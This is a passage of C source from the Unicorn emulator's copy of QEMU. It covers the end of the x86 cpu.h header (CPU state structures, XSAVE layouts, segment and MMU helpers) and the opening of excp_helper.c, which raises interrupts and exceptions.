XSaveOpmask { uint64_t opmask_regs[NB_OPMASK_REGS]; } XSaveOpmask; /* Ext. save area 6: ZMM_Hi256 */ typedef struct XSaveZMM_Hi256 { uint8_t zmm_hi256[16][32]; } XSaveZMM_Hi256; /* Ext. save area 7: Hi16_ZMM */ typedef struct XSaveHi16_ZMM { uint8_t hi16_zmm[16][64]; } XSaveHi16_ZMM; /* Ext. save area 9: PKRU state */ typedef struct XSavePKRU { uint32_t pkru; uint32_t padding; } XSavePKRU; typedef struct X86XSaveArea { X86LegacyXSaveArea legacy; X86XSaveHeader header; /* Extended save areas: */ /* AVX State: */ XSaveAVX avx_state; uint8_t padding[960 - 576 - sizeof(XSaveAVX)]; /* MPX State: */ XSaveBNDREG bndreg_state; XSaveBNDCSR bndcsr_state; /* AVX-512 State: */ XSaveOpmask opmask_state; XSaveZMM_Hi256 zmm_hi256_state; XSaveHi16_ZMM hi16_zmm_state; /* PKRU State: */ XSavePKRU pkru_state; } X86XSaveArea; QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, avx_state) != 0x240); QEMU_BUILD_BUG_ON(sizeof(XSaveAVX) != 0x100); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, bndreg_state) != 0x3c0); QEMU_BUILD_BUG_ON(sizeof(XSaveBNDREG) != 0x40); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, bndcsr_state) != 0x400); QEMU_BUILD_BUG_ON(sizeof(XSaveBNDCSR) != 0x40); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, opmask_state) != 0x440); QEMU_BUILD_BUG_ON(sizeof(XSaveOpmask) != 0x40); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, zmm_hi256_state) != 0x480); QEMU_BUILD_BUG_ON(sizeof(XSaveZMM_Hi256) != 0x200); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, hi16_zmm_state) != 0x680); QEMU_BUILD_BUG_ON(sizeof(XSaveHi16_ZMM) != 0x400); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, pkru_state) != 0xA80); QEMU_BUILD_BUG_ON(sizeof(XSavePKRU) != 0x8); typedef enum TPRAccess { TPR_ACCESS_READ, TPR_ACCESS_WRITE, } TPRAccess; /* Cache information data structures: */ enum CacheType { DATA_CACHE, INSTRUCTION_CACHE, UNIFIED_CACHE }; typedef struct CPUCacheInfo { enum CacheType type; uint8_t level; /* Size in bytes */ uint32_t size; /* Line size, in bytes */ uint16_t line_size; /* * Associativity. * Note: representation of fully-associative caches is not implemented */ uint8_t associativity; /* Physical line partitions. CPUID[0x8000001D].EBX, CPUID[4].EBX */ uint8_t partitions; /* Number of sets. CPUID[0x8000001D].ECX, CPUID[4].ECX */ uint32_t sets; /* * Lines per tag. * AMD-specific: CPUID[0x80000005], CPUID[0x80000006]. * (Is this synonym to @partitions?) 
*/ uint8_t lines_per_tag; /* Self-initializing cache */ bool self_init; /* * WBINVD/INVD is not guaranteed to act upon lower level caches of * non-originating threads sharing this cache. * CPUID[4].EDX[bit 0], CPUID[0x8000001D].EDX[bit 0] */ bool no_invd_sharing; /* * Cache is inclusive of lower cache levels. * CPUID[4].EDX[bit 1], CPUID[0x8000001D].EDX[bit 1]. */ bool inclusive; /* * A complex function is used to index the cache, potentially using all * address bits. CPUID[4].EDX[bit 2]. */ bool complex_indexing; } CPUCacheInfo; typedef struct CPUCaches { CPUCacheInfo *l1d_cache; CPUCacheInfo *l1i_cache; CPUCacheInfo *l2_cache; CPUCacheInfo *l3_cache; } CPUCaches; typedef struct CPUX86State { /* standard registers */ target_ulong regs[CPU_NB_REGS]; target_ulong eip; target_ulong eflags; /* eflags register. During CPU emulation, CC flags and DF are set to zero because they are stored elsewhere */ /* emulator internal eflags handling */ target_ulong cc_dst; target_ulong cc_src; target_ulong cc_src2; uint32_t cc_op; int32_t df; /* D flag : 1 if D = 0, -1 if D = 1 */ uint32_t hflags; /* TB flags, see HF_xxx constants. These flags are known at translation time. */ uint32_t hflags2; /* various other flags, see HF2_xxx constants. */ /* segments */ SegmentCache segs[6]; /* selector values */ SegmentCache ldt; SegmentCache tr; SegmentCache gdt; /* only base and limit are used */ SegmentCache idt; /* only base and limit are used */ target_ulong cr[5]; /* NOTE: cr1 is unused */ int32_t a20_mask; BNDReg bnd_regs[4]; BNDCSReg bndcs_regs; uint64_t msr_bndcfgs; uint64_t efer; /* Beginning of state preserved by INIT (dummy marker). */ int start_init_save; /* FPU state */ unsigned int fpstt; /* top of stack index */ uint16_t fpus; uint16_t fpuc; uint8_t fptags[8]; /* 0 = valid, 1 = empty */ FPReg fpregs[8]; /* KVM-only so far */ uint16_t fpop; uint16_t fpcs; uint16_t fpds; uint64_t fpip; uint64_t fpdp; /* emulator internal variables */ float_status fp_status; floatx80 ft0; float_status mmx_status; /* for 3DNow! float ops */ float_status sse_status; uint32_t mxcsr; ZMMReg xmm_regs[CPU_NB_REGS == 8 ? 8 : 32]; ZMMReg xmm_t0; MMXReg mmx_t0; XMMReg ymmh_regs[CPU_NB_REGS]; uint64_t opmask_regs[NB_OPMASK_REGS]; YMMReg zmmh_regs[CPU_NB_REGS]; ZMMReg hi16_zmm_regs[CPU_NB_REGS]; /* sysenter registers */ uint32_t sysenter_cs; target_ulong sysenter_esp; target_ulong sysenter_eip; uint64_t star; uint64_t vm_hsave; #ifdef TARGET_X86_64 target_ulong lstar; target_ulong cstar; target_ulong fmask; target_ulong kernelgsbase; #endif uint64_t tsc; uint64_t tsc_adjust; uint64_t tsc_deadline; uint64_t tsc_aux; uint64_t xcr0; uint64_t mcg_status; uint64_t msr_ia32_misc_enable; uint64_t msr_ia32_feature_control; uint64_t msr_fixed_ctr_ctrl; uint64_t msr_global_ctrl; uint64_t msr_global_status; uint64_t msr_global_ovf_ctrl; uint64_t msr_fixed_counters[MAX_FIXED_COUNTERS]; uint64_t msr_gp_counters[MAX_GP_COUNTERS]; uint64_t msr_gp_evtsel[MAX_GP_COUNTERS]; uint64_t pat; uint32_t smbase; uint64_t msr_smi_count; uint32_t pkru; uint32_t tsx_ctrl; uint64_t spec_ctrl; uint64_t virt_ssbd; /* End of state preserved by INIT (dummy marker). 
*/ int end_init_save; uint64_t system_time_msr; uint64_t wall_clock_msr; uint64_t steal_time_msr; uint64_t async_pf_en_msr; uint64_t pv_eoi_en_msr; uint64_t poll_control_msr; /* exception/interrupt handling */ int error_code; int exception_is_int; target_ulong exception_next_eip; target_ulong dr[8]; /* debug registers; note dr4 and dr5 are unused */ union { struct CPUBreakpoint *cpu_breakpoint[4]; struct CPUWatchpoint *cpu_watchpoint[4]; }; /* break/watchpoints for dr[0..3] */ int old_exception; /* exception in flight */ uint64_t vm_vmcb; uint64_t tsc_offset; uint64_t intercept; uint16_t intercept_cr_read; uint16_t intercept_cr_write; uint16_t intercept_dr_read; uint16_t intercept_dr_write; uint32_t intercept_exceptions; uint64_t nested_cr3; uint32_t nested_pg_mode; uint8_t v_tpr; uintptr_t retaddr; /* Fields up to this point are cleared by a CPU reset */ int end_reset_fields; /* Fields after this point are preserved across CPU reset. */ /* processor features (e.g. for CPUID insn) */ /* Minimum cpuid leaf 7 value */ uint32_t cpuid_level_func7; /* Actual cpuid leaf 7 value */ uint32_t cpuid_min_level_func7; /* Minimum level/xlevel/xlevel2, based on CPU model + features */ uint32_t cpuid_min_level, cpuid_min_xlevel, cpuid_min_xlevel2; /* Maximum level/xlevel/xlevel2 value for auto-assignment: */ uint32_t cpuid_max_level, cpuid_max_xlevel, cpuid_max_xlevel2; /* Actual level/xlevel/xlevel2 value: */ uint32_t cpuid_level, cpuid_xlevel, cpuid_xlevel2; uint32_t cpuid_vendor1; uint32_t cpuid_vendor2; uint32_t cpuid_vendor3; uint32_t cpuid_version; FeatureWordArray features; /* Features that were explicitly enabled/disabled */ FeatureWordArray user_features; uint32_t cpuid_model[12]; /* Cache information for CPUID. When legacy-cache=on, the cache data * on each CPUID leaf will be different, because we keep compatibility * with old QEMU versions. */ CPUCaches cache_info_cpuid2, cache_info_cpuid4, cache_info_amd; /* MTRRs */ uint64_t mtrr_fixed[11]; uint64_t mtrr_deftype; MTRRVar mtrr_var[MSR_MTRRcap_VCNT]; /* For KVM */ uint32_t mp_state; int32_t exception_nr; int32_t interrupt_injected; uint8_t soft_interrupt; uint8_t exception_pending; uint8_t exception_injected; uint8_t has_error_code; uint8_t exception_has_payload; uint64_t exception_payload; uint32_t ins_len; uint32_t sipi_vector; bool tsc_valid; int64_t tsc_khz; int64_t user_tsc_khz; /* for sanity check only */ uint64_t mcg_cap; uint64_t mcg_ctl; uint64_t mcg_ext_ctl; uint64_t mce_banks[MCE_BANKS_DEF*4]; uint64_t xstate_bv; /* vmstate */ uint16_t fpus_vmstate; uint16_t fptag_vmstate; uint16_t fpregs_format_vmstate; uint64_t xss; uint32_t umwait; TPRAccess tpr_access_type; unsigned nr_dies; unsigned nr_nodes; unsigned pkg_offset; // Unicorn engine struct uc_struct *uc; } CPUX86State; /** * X86CPU: * @env: #CPUX86State * @migratable: If set, only migratable flags will be accepted when "enforce" * mode is used, and only migratable flags will be included in the "host" * CPU model. * * An x86 CPU. */ struct X86CPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUX86State env; uint64_t ucode_rev; bool check_cpuid; bool enforce_cpuid; /* * Force features to be enabled even if the host doesn't support them. * This is dangerous and should be done only for testing CPUID * compatibility. 
 */
    bool force_features;

    bool expose_kvm;
    bool expose_tcg;
    bool migratable;
    bool migrate_smi_count;
    bool max_features; /* Enable all supported features automatically */
    uint32_t apic_id;

    /* Enables publishing of TSC increment and Local APIC bus frequencies to
     * the guest OS in CPUID page 0x40000010, the same way that VMWare does.
     */
    bool vmware_cpuid_freq;

    /* if true the CPUID code directly forwards host cache leaves to the guest */
    bool cache_info_passthrough;

    /* if true the CPUID code directly forwards
     * host monitor/mwait leaves to the guest */
    struct {
        uint32_t eax;
        uint32_t ebx;
        uint32_t ecx;
        uint32_t edx;
    } mwait;

    /* Features that were filtered out because of missing host capabilities */
    FeatureWordArray filtered_features;

    /* Enable PMU CPUID bits. This can't be enabled by default yet because
     * it doesn't have ABI stability guarantees, as it passes all PMU CPUID
     * bits returned by GET_SUPPORTED_CPUID (that depend on host CPU and kernel
     * capabilities) directly to the guest.
     */
    bool enable_pmu;

    /* LMCE support can be enabled/disabled via cpu option 'lmce=on/off'. It is
     * disabled by default to avoid breaking migration between QEMU with
     * different LMCE configurations.
     */
    bool enable_lmce;

    /* Compatibility bits for old machine types.
     * If true, present a virtual l3 cache to the VM; the vcpus in the same
     * virtual socket share a virtual l3 cache.
     */
    bool enable_l3_cache;

    /* Compatibility bits for old machine types.
     * If true, present the old cache topology information
     */
    bool legacy_cache;

    /* Compatibility bits for old machine types: */
    bool enable_cpuid_0xb;

    /* Enable auto level-increase for all CPUID leaves */
    bool full_cpuid_auto_level;

    /* Enable auto level-increase for the Intel Processor Trace leaf */
    bool intel_pt_auto_level;

    /* if true fill the top bits of the MTRR_PHYSMASKn variable range */
    bool fill_mtrr_mask;

    /* if true override the phys_bits value with a value read from the host */
    bool host_phys_bits;

    /* if set, limit maximum value for phys_bits when host_phys_bits is true */
    uint8_t host_phys_bits_limit;

    /* Number of physical address bits supported */
    uint32_t phys_bits;

#if 0
    /* in order to simplify APIC support, we leave this pointer to the user */
    struct DeviceState *apic_state;
    struct MemoryRegion *cpu_as_root, *cpu_as_mem, *smram;
#endif

    int32_t node_id; /* NUMA node this CPU belongs to */
    int32_t socket_id;
    int32_t die_id;
    int32_t core_id;
    int32_t thread_id;

    int32_t hv_max_vps;

    struct X86CPUClass cc;
};

#define X86_CPU(obj) ((X86CPU *)obj)
#define X86_CPU_CLASS(klass) ((X86CPUClass *)klass)
#define X86_CPU_GET_CLASS(obj) (&((X86CPU *)obj)->cc)

/**
 * x86_cpu_do_interrupt:
 * @cpu: vCPU the interrupt is to be handled by.
*/ void x86_cpu_do_interrupt(CPUState *cpu); bool x86_cpu_exec_interrupt(CPUState *cpu, int int_req); int x86_cpu_pending_interrupt(CPUState *cs, int interrupt_request); void x86_cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list); hwaddr x86_cpu_get_phys_page_attrs_debug(CPUState *cpu, vaddr addr, MemTxAttrs *attrs); void x86_cpu_exec_enter(CPUState *cpu); void x86_cpu_exec_exit(CPUState *cpu); int cpu_x86_support_mca_broadcast(CPUX86State *env); int cpu_get_pic_interrupt(CPUX86State *s); /* MSDOS compatibility mode FPU exception support */ void x86_register_ferr_irq(qemu_irq irq); void cpu_set_ignne(CPUX86State *env); /* mpx_helper.c */ void cpu_sync_bndcs_hflags(CPUX86State *env); /* this function must always be used to load data in the segment cache: it synchronizes the hflags with the segment cache values */ static inline void cpu_x86_load_seg_cache(CPUX86State *env, int seg_reg, unsigned int selector, target_ulong base, unsigned int limit, unsigned int flags) { SegmentCache *sc; unsigned int new_hflags; sc = &env->segs[seg_reg]; sc->selector = selector; sc->base = base; sc->limit = limit; sc->flags = flags; /* update the hidden flags */ { if (seg_reg == R_CS) { #ifdef TARGET_X86_64 if ((env->hflags & HF_LMA_MASK) && (flags & DESC_L_MASK)) { /* long mode */ env->hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_CS64_MASK; env->hflags &= ~(HF_ADDSEG_MASK); } else #endif { /* legacy / compatibility case */ new_hflags = (env->segs[R_CS].flags & DESC_B_MASK) >> (DESC_B_SHIFT - HF_CS32_SHIFT); env->hflags = (env->hflags & ~(HF_CS32_MASK | HF_CS64_MASK)) | new_hflags; } } if (seg_reg == R_SS) { int cpl = (flags >> DESC_DPL_SHIFT) & 3; #if HF_CPL_MASK != 3 #error HF_CPL_MASK is hardcoded #endif env->hflags = (env->hflags & ~HF_CPL_MASK) | cpl; /* Possibly switch between BNDCFGS and BNDCFGU */ cpu_sync_bndcs_hflags(env); } new_hflags = (env->segs[R_SS].flags & DESC_B_MASK) >> (DESC_B_SHIFT - HF_SS32_SHIFT); if (env->hflags & HF_CS64_MASK) { /* zero base assumed for DS, ES and SS in long mode */ } else if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK) || !(env->hflags & HF_CS32_MASK)) { /* XXX: try to avoid this test. The problem comes from the fact that is real mode or vm86 mode we only modify the 'base' and 'selector' fields of the segment cache to go faster. A solution may be to force addseg to one in translate-i386.c. 
*/ new_hflags |= HF_ADDSEG_MASK; } else { new_hflags |= ((env->segs[R_DS].base | env->segs[R_ES].base | env->segs[R_SS].base) != 0) << HF_ADDSEG_SHIFT; } env->hflags = (env->hflags & ~(HF_SS32_MASK | HF_ADDSEG_MASK)) | new_hflags; } } static inline void cpu_x86_load_seg_cache_sipi(X86CPU *cpu, uint8_t sipi_vector) { CPUState *cs = CPU(cpu); CPUX86State *env = &cpu->env; env->eip = 0; cpu_x86_load_seg_cache(env, R_CS, sipi_vector << 8, sipi_vector << 12, env->segs[R_CS].limit, env->segs[R_CS].flags); cs->halted = 0; } int cpu_x86_get_descr_debug(CPUX86State *env, unsigned int selector, target_ulong *base, unsigned int *limit, unsigned int *flags); /* op_helper.c */ /* used for debug or cpu save/restore */ /* cpu-exec.c */ /* the following helpers are only usable in user mode simulation as they can trigger unexpected exceptions */ void cpu_x86_load_seg(CPUX86State *s, int seg_reg, int selector); void cpu_x86_fsave(CPUX86State *s, target_ulong ptr, int data32); void cpu_x86_frstor(CPUX86State *s, target_ulong ptr, int data32); void cpu_x86_fxsave(CPUX86State *s, target_ulong ptr); void cpu_x86_fxrstor(CPUX86State *s, target_ulong ptr); /* you can call this signal handler from your SIGBUS and SIGSEGV signal handlers to inform the virtual CPU of exceptions. non zero is returned if the signal was handled by the virtual CPU. */ int cpu_x86_signal_handler(int host_signum, void *pinfo, void *puc); /* cpu.c */ void cpu_x86_cpuid(CPUX86State *env, uint32_t index, uint32_t count, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx); void cpu_clear_apic_feature(CPUX86State *env); void host_cpuid(uint32_t function, uint32_t count, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx); void host_vendor_fms(char *vendor, int *family, int *model, int *stepping); /* helper.c */ bool x86_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); void x86_cpu_set_a20(X86CPU *cpu, int a20_state); static inline int x86_asidx_from_attrs(CPUState *cs, MemTxAttrs attrs) { return !!attrs.secure; } static inline AddressSpace *cpu_addressspace(CPUState *cs, MemTxAttrs attrs) { return cpu_get_address_space(cs, cpu_asidx_from_attrs(cs, attrs)); } uint8_t x86_ldub_phys(CPUState *cs, hwaddr addr); uint32_t x86_lduw_phys(CPUState *cs, hwaddr addr); uint32_t x86_ldl_phys(CPUState *cs, hwaddr addr); uint64_t x86_ldq_phys(CPUState *cs, hwaddr addr); void x86_stb_phys(CPUState *cs, hwaddr addr, uint8_t val); void x86_stl_phys_notdirty(CPUState *cs, hwaddr addr, uint32_t val); void x86_stw_phys(CPUState *cs, hwaddr addr, uint32_t val); void x86_stl_phys(CPUState *cs, hwaddr addr, uint32_t val); void x86_stq_phys(CPUState *cs, hwaddr addr, uint64_t val); void breakpoint_handler(CPUState *cs); /* will be suppressed */ void cpu_x86_update_cr0(CPUX86State *env, uint32_t new_cr0); void cpu_x86_update_cr3(CPUX86State *env, target_ulong new_cr3); void cpu_x86_update_cr4(CPUX86State *env, uint32_t new_cr4); void cpu_x86_update_dr7(CPUX86State *env, uint32_t new_dr7); /* hw/pc.c */ uint64_t cpu_get_tsc(CPUX86State *env); /* XXX: This value should match the one returned by CPUID * and in exec.c */ # if defined(TARGET_X86_64) # define TCG_PHYS_ADDR_BITS 40 # else # define TCG_PHYS_ADDR_BITS 36 # endif #define PHYS_ADDR_MASK MAKE_64BIT_MASK(0, TCG_PHYS_ADDR_BITS) #define X86_CPU_TYPE_SUFFIX "-" TYPE_X86_CPU #define X86_CPU_TYPE_NAME(name) (name X86_CPU_TYPE_SUFFIX) #define CPU_RESOLVING_TYPE TYPE_X86_CPU #ifdef TARGET_X86_64 #define TARGET_DEFAULT_CPU_TYPE 
X86_CPU_TYPE_NAME("qemu64") #else #define TARGET_DEFAULT_CPU_TYPE X86_CPU_TYPE_NAME("qemu32") #endif #define cpu_signal_handler cpu_x86_signal_handler /* MMU modes definitions */ #define MMU_KSMAP_IDX 0 #define MMU_USER_IDX 1 #define MMU_KNOSMAP_IDX 2 static inline int cpu_mmu_index(CPUX86State *env, bool ifetch) { return (env->hflags & HF_CPL_MASK) == 3 ? MMU_USER_IDX : (!(env->hflags & HF_SMAP_MASK) || (env->eflags & AC_MASK)) ? MMU_KNOSMAP_IDX : MMU_KSMAP_IDX; } static inline int cpu_mmu_index_kernel(CPUX86State *env) { return !(env->hflags & HF_SMAP_MASK) ? MMU_KNOSMAP_IDX : ((env->hflags & HF_CPL_MASK) < 3 && (env->eflags & AC_MASK)) ? MMU_KNOSMAP_IDX : MMU_KSMAP_IDX; } #define CC_DST (env->cc_dst) #define CC_SRC (env->cc_src) #define CC_SRC2 (env->cc_src2) #define CC_OP (env->cc_op) /* n must be a constant to be efficient */ static inline target_long lshift(target_long x, int n) { if (n >= 0) { return x << n; } else { return x >> (-n); } } /* float macros */ #define FT0 (env->ft0) #define ST0 (env->fpregs[env->fpstt].d) #define ST(n) (env->fpregs[(env->fpstt + (n)) & 7].d) #define ST1 ST(1) /* translate.c */ void tcg_x86_init(struct uc_struct *uc); typedef CPUX86State CPUArchState; typedef X86CPU ArchCPU; #include "exec/cpu-all.h" #include "svm.h" static inline void cpu_get_tb_cpu_state(CPUX86State *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *cs_base = env->segs[R_CS].base; *pc = *cs_base + env->eip; *flags = env->hflags | (env->eflags & (IOPL_MASK | TF_MASK | RF_MASK | VM_MASK | AC_MASK)); } void do_cpu_init(X86CPU *cpu); void do_cpu_sipi(X86CPU *cpu); /* excp_helper.c */ void QEMU_NORETURN raise_exception(CPUX86State *env, int exception_index); void QEMU_NORETURN raise_exception_ra(CPUX86State *env, int exception_index, uintptr_t retaddr); void QEMU_NORETURN raise_exception_err(CPUX86State *env, int exception_index, int error_code); void QEMU_NORETURN raise_exception_err_ra(CPUX86State *env, int exception_index, int error_code, uintptr_t retaddr); void QEMU_NORETURN raise_interrupt(CPUX86State *nenv, int intno, int is_int, int error_code, int next_eip_addend); /* cc_helper.c */ extern const uint8_t parity_table[256]; uint32_t cpu_cc_compute_all(CPUX86State *env1, int op); static inline uint32_t cpu_compute_eflags(CPUX86State *env) { return (env->eflags & ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)) | cpu_cc_compute_all(env, CC_OP) | (env->df & DF_MASK); } /* NOTE: the translator must set DisasContext.cc_op to CC_OP_EFLAGS * after generating a call to a helper that uses this. */ static inline void cpu_load_eflags(CPUX86State *env, int eflags, int update_mask) { CC_SRC = eflags & (CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); CC_OP = CC_OP_EFLAGS; env->df = 1 - (2 * ((eflags >> 10) & 1)); env->eflags = (env->eflags & ~update_mask) | (eflags & update_mask) | 0x2; } /* load efer and update the corresponding hflags. XXX: do consistency checks with cpuid bits? 
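The cpu_mmu_index() policy defined above is compact enough to restate in isolation. A hedged sketch: the bit positions below are copied from this file's HF_* and AC_MASK definitions so the program is self-contained, and mmu_index() is an invented local name, not the QEMU API.

#include <stdio.h>

#define HF_CPL_MASK  3
#define HF_SMAP_MASK (1 << 23)
#define AC_MASK      0x00040000

static int mmu_index(unsigned hflags, unsigned eflags)
{
    if ((hflags & HF_CPL_MASK) == 3)
        return 1;                       /* MMU_USER_IDX */
    if (!(hflags & HF_SMAP_MASK) || (eflags & AC_MASK))
        return 2;                       /* MMU_KNOSMAP_IDX: SMAP checks off */
    return 0;                           /* MMU_KSMAP_IDX: SMAP enforced */
}

int main(void)
{
    printf("CPL3:            %d\n", mmu_index(3, 0));
    printf("CPL0, no SMAP:   %d\n", mmu_index(0, 0));
    printf("CPL0, SMAP:      %d\n", mmu_index(HF_SMAP_MASK, 0));
    printf("CPL0, SMAP + AC: %d\n", mmu_index(HF_SMAP_MASK, AC_MASK));
    return 0;
}

Keeping three separate indexes means kernel accesses with EFLAGS.AC set share TLB entries with the no-SMAP case, so toggling AC never requires a TLB flush.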
*/
static inline void cpu_load_efer(CPUX86State *env, uint64_t val)
{
    env->efer = val;
    env->hflags &= ~(HF_LMA_MASK | HF_SVME_MASK);
    if (env->efer & MSR_EFER_LMA) {
        env->hflags |= HF_LMA_MASK;
    }
    if (env->efer & MSR_EFER_SVME) {
        env->hflags |= HF_SVME_MASK;
    }
}

static inline MemTxAttrs cpu_get_mem_attrs(CPUX86State *env)
{
    if ((env->hflags & HF_SMM_MASK) != 0)
        return ((MemTxAttrs) { .secure = true });
    else
        return ((MemTxAttrs) { .secure = false });
}

static inline int32_t x86_get_a20_mask(CPUX86State *env)
{
    if (env->hflags & HF_SMM_MASK) {
        return -1;
    } else {
        return env->a20_mask;
    }
}

static inline bool cpu_has_vmx(CPUX86State *env)
{
    return env->features[FEAT_1_ECX] & CPUID_EXT_VMX;
}

/*
 * In order for a vCPU to enter VMX operation it must have CR4.VMXE set.
 * Once it is set, CR4.VMXE must remain set as long as the vCPU is in
 * VMX operation. This is because CR4.VMXE is one of the bits set
 * in MSR_IA32_VMX_CR4_FIXED1.
 *
 * There is one exception to the above statement: when a vCPU enters SMM mode,
 * it temporarily exits VMX operation and may also reset CR4.VMXE during
 * execution in SMM mode.
 * When the vCPU exits SMM mode, its state is restored to VMX operation
 * and CR4.VMXE is restored to its original, set value.
 *
 * Therefore, when the vCPU is not in SMM mode, we can infer whether
 * VMX is being used by examining CR4.VMXE. Otherwise, we cannot
 * know for certain.
 */
static inline bool cpu_vmx_maybe_enabled(CPUX86State *env)
{
    return cpu_has_vmx(env) &&
           ((env->cr[4] & CR4_VMXE_MASK) || (env->hflags & HF_SMM_MASK));
}

/* fpu_helper.c */
void update_fp_status(CPUX86State *env);
void update_mxcsr_status(CPUX86State *env);

static inline void cpu_set_mxcsr(CPUX86State *env, uint32_t mxcsr)
{
    env->mxcsr = mxcsr;
    update_mxcsr_status(env);
}

static inline void cpu_set_fpuc(CPUX86State *env, uint16_t fpuc)
{
    env->fpuc = fpuc;
    update_fp_status(env);
}

/* mem_helper.c */
void helper_lock_init(void);

/* svm_helper.c */
void cpu_svm_check_intercept_param(CPUX86State *env1, uint32_t type,
                                   uint64_t param, uintptr_t retaddr);
void QEMU_NORETURN cpu_vmexit(CPUX86State *nenv, uint32_t exit_code,
                              uint64_t exit_info_1, uintptr_t retaddr);
void do_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1);

/* seg_helper.c */
void do_interrupt_x86_hardirq(CPUX86State *env, int intno, int is_hw);

/* smm_helper.c */
void do_smm_enter(X86CPU *cpu);

/* Special values for X86CPUVersion: */

/* Resolve to latest CPU version */
#define CPU_VERSION_LATEST -1

/*
 * Resolve to version defined by current machine type.
 * See x86_cpu_set_default_version()
 */
#define CPU_VERSION_AUTO -2

/* Don't resolve to any versioned CPU models, like old QEMU versions */
#define CPU_VERSION_LEGACY 0

typedef int X86CPUVersion;

/*
 * Set default CPU model version for CPU models having
 * version == CPU_VERSION_AUTO.
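x86_get_a20_mask() above collapses to -1 (all bits pass) in SMM and to env->a20_mask otherwise. A stand-alone sketch of what that mask does when the A20 line is gated off; the ~(1 << 20) value is an assumption based on how the A20 gate works (bit 20 forced low), and the probe address is the classic HMA example.

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    int32_t a20_disabled = ~(1 << 20); /* bit 20 forced to zero */
    int32_t a20_enabled = -1;          /* every address bit passes through */
    uint32_t addr = 0x100010;          /* 1 MiB + 0x10 */

    printf("A20 off: %#x -> %#x\n", addr, addr & a20_disabled);
    printf("A20 on:  %#x -> %#x\n", addr, addr & a20_enabled);
    return 0;
}

With A20 off the access wraps to 0x10, reproducing 8086-style 1 MiB wraparound.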
*/
void x86_cpu_set_default_version(X86CPUVersion version);

/* Return name of 32-bit register, from a R_* constant */
const char *get_register_name_32(unsigned int reg);

#define APIC_DEFAULT_ADDRESS 0xfee00000
#define APIC_SPACE_SIZE 0x100000

/* cpu.c */
bool cpu_is_bsp(X86CPU *cpu);

void x86_cpu_xrstor_all_areas(X86CPU *cpu, const X86XSaveArea *buf);
void x86_cpu_xsave_all_areas(X86CPU *cpu, X86XSaveArea *buf);
void x86_update_hflags(CPUX86State *env);

int uc_check_cpu_x86_load_seg(CPUX86State *env, int seg_reg, int sel);
X86CPU *cpu_x86_init(struct uc_struct *uc);

#endif /* I386_CPU_H */

unicorn-2.1.1/qemu/target/i386/excp_helper.c

/*
 * x86 exception helpers
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */
#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/exec-all.h"
#include "qemu/log.h"
#include "exec/helper-proto.h"
#include "sysemu/sysemu.h"
#include "uc_priv.h"

void helper_raise_interrupt(CPUX86State *env, int intno, int next_eip_addend)
{
    raise_interrupt(env, intno, 1, 0, next_eip_addend);
}

void helper_raise_exception(CPUX86State *env, int exception_index)
{
    raise_exception(env, exception_index);
}

/*
 * Check nested exceptions and change to double or triple fault if
 * needed. It should only be called if this is not an interrupt.
 * Returns the new exception number.
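These fault-class rules are small enough to exercise on their own. The sketch below restates only the classification (vector numbers per the Intel SDM: 0 = #DE, 10..13 = #TS..#GP, 14 = #PF, 8 = #DF); classify() is an invented name, and the triple-fault case is reported as -1 instead of requesting a reset.

#include <stdio.h>

#define EXCP08_DBLE 8
#define EXCP0E_PAGE 14

static int classify(int old_excp, int intno)
{
    int first_contributory = old_excp == 0 ||
                             (old_excp >= 10 && old_excp <= 13);
    int second_contributory = intno == 0 || (intno >= 10 && intno <= 13);

    if (old_excp == EXCP08_DBLE)
        return -1; /* triple fault: the real code requests a system reset */
    if ((first_contributory && second_contributory) ||
        (old_excp == EXCP0E_PAGE &&
         (second_contributory || intno == EXCP0E_PAGE)))
        return EXCP08_DBLE;
    return intno;
}

int main(void)
{
    printf("#GP during #GP -> %d (double fault)\n", classify(13, 13));
    printf("#PF during #PF -> %d (double fault)\n", classify(14, 14));
    printf("#DE during #DF -> %d (triple fault)\n", classify(8, 0));
    printf("#UD during #GP -> %d (benign, delivered as-is)\n", classify(13, 6));
    return 0;
}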
